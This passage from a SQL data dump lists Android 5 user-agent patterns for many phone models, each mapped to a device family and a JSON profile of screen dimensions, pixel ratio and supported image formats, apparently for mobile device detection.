Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; C6616) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; C6740N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; C6743) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; C6802) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":540,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; C6833) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":540,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; C6902) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; C6903) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; C6906) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; C6943) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; CASPER_VIA_E1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; CASPER_VIA_M1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; CHC-U01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; CHC-U23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; CHM-U01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; CITI Z530 3G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; CP8298_I00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; CP8676_I02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; CPH1605) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; CUBE_LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; CUBOT_NOTE_S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; CUN-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Casper_VIA_V10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Casper_VIA_V3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Casper_VIA_V9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Che1-L04) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Che2-L11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Classic Joy) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Cloud String V2.0) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Coolpad 3622A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_coolpad','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Coolpad A8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_coolpad','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Coolpad E501_EU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_coolpad','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Coolpad E561) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_coolpad','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Coolpad E561_EU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_coolpad','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Coolpad E570) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_coolpad','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Coolpad E571) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_coolpad','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Coolpad R108) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_coolpad','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; D2302) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; D2303) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; D2305) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; D2306) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; D2403) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; D2406) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; D2502) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; D2533) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; D5303) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; D5306) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; D5316) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; D5322) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":854,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; D5503) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; D5803) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; D6503) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; D6603) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; D6616) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; D6643) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; D6646) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; D6653) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; D6683) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; D6708) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; DM-01G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Desire 500 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Desire 820G+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Doro 8030) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Doro 8030/8031/8028) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Doro 8031) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; E2303) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; E2306) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; E2312) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; E2333) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; E2353) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; E2363) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; E505) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; E505plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; E506) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; E506plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; E50L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; E5303) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; E5306) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; E5333) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; E5353) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; E5500LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; E5506) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; E5533) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; E5563) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; E560) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; E5603) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 